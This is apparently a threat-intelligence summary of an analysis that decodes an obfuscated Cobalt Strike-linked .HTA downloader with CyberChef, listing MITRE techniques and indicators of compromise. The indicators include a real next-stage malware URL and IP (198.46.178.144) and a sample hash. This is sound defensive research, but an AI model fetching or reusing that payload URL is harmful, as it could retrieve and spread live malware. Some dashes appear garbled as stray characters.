This article analyzes decoding a .HTA downloader script linked to the Cobalt Strike toolkit, showing how simple obfuscation like Base64URL and excessive spacing can be reversed with CyberChef. It reveals a downloader that fetches a next-stage VBS file from a remote server, illustrating a practical reverse-engineering workflow. hashtags: #CobaltStrike #HTA #MalwareBazaar #CyberChef #Base64 #URLEncoding #morningfiledatinglover.vbs #URLDownloadToFile
Keypoints
- The .HTA script is found on Malware Bazaar and is linked to the Cobalt Strike toolkit.
- Basic obfuscation techniques include Base64URL encoding and excessive spacing.
- CyberChef is used to decode the URL-encoded content across multiple layers.
- Regular expressions are applied to remove excessive whitespace for readability.
- Decoded content reveals a downloader function that uses URLDownloadToFile.
- The next-stage file is identified as http://198.46[.]178.144/morningfiledatinglover[.]vbs.
MITRE Techniques
- [T1071] Command and Control β Brief description of how HTTP is used for C2 communications. βUse of HTTP for command and control communication.β
- [T1001] Data Obfuscation β Brief description of encoding techniques like Base64 and URL encoding to obfuscate data. βUse of encoding techniques like Base64 and URL encoding to obfuscate data.β
- [T1105] Remote File Copy β Brief description of downloading files from a remote server using a downloader function. βDownloading files from a remote server using URLDownloadToFile.β
Indicators of Compromise
- [IP] next-stage host β 198.46.178.144 (observed as the destination for the next-stage file)
- [URL] downloader URL β http://198.46[.]178.144/morningfiledatinglover[.]vbs
- [File hash] sample hash β 2807199adde4730e5e89c5f0ed3d48380dac746a44fa1e5fe0ca0186743a97e0
- [File name] next-stage file β morningfiledatinglover.vbs
- [Domain] hosting domain β bazaar.abuse.ch (Malware Bazaar sample source)
Read more: https://www.embeeresearch.io/decoding-a-cobalt-strike-downloader-script-with-cyberchef/